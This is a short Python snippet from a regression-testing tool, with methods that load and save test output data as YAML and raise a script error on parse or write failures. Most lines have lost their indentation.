def load_output(self, path):
# Load test output data from a file.
assert isinstance(path, str)
stream = open(path, 'rb')
loader = RegressYAMLLoader(self, False, True, stream)
        try:
            output = loader.load()
        except yaml.YAMLError as exc:
            raise ScriptError("failed to load test output data: %s" % exc)
        return output
def save_output(self, path, output):
# Serialize and write test output data to a file.
assert isinstance(path, str)
assert isinstance(output, TestData)
stream = open(path, 'wb')
if self.output_help is not None:
self.ctl.out(trim_doc(self.output_help), file=stream)
self.ctl.out(file=stream)
dumper = RegressYAMLDumper(self, False, True, stream)
try:
dumper.dump(output)
except yaml.YAMLError as exc:
raise ScriptError("failed to write test output data: %s" % exc)
|
nilq/baby-python
|
python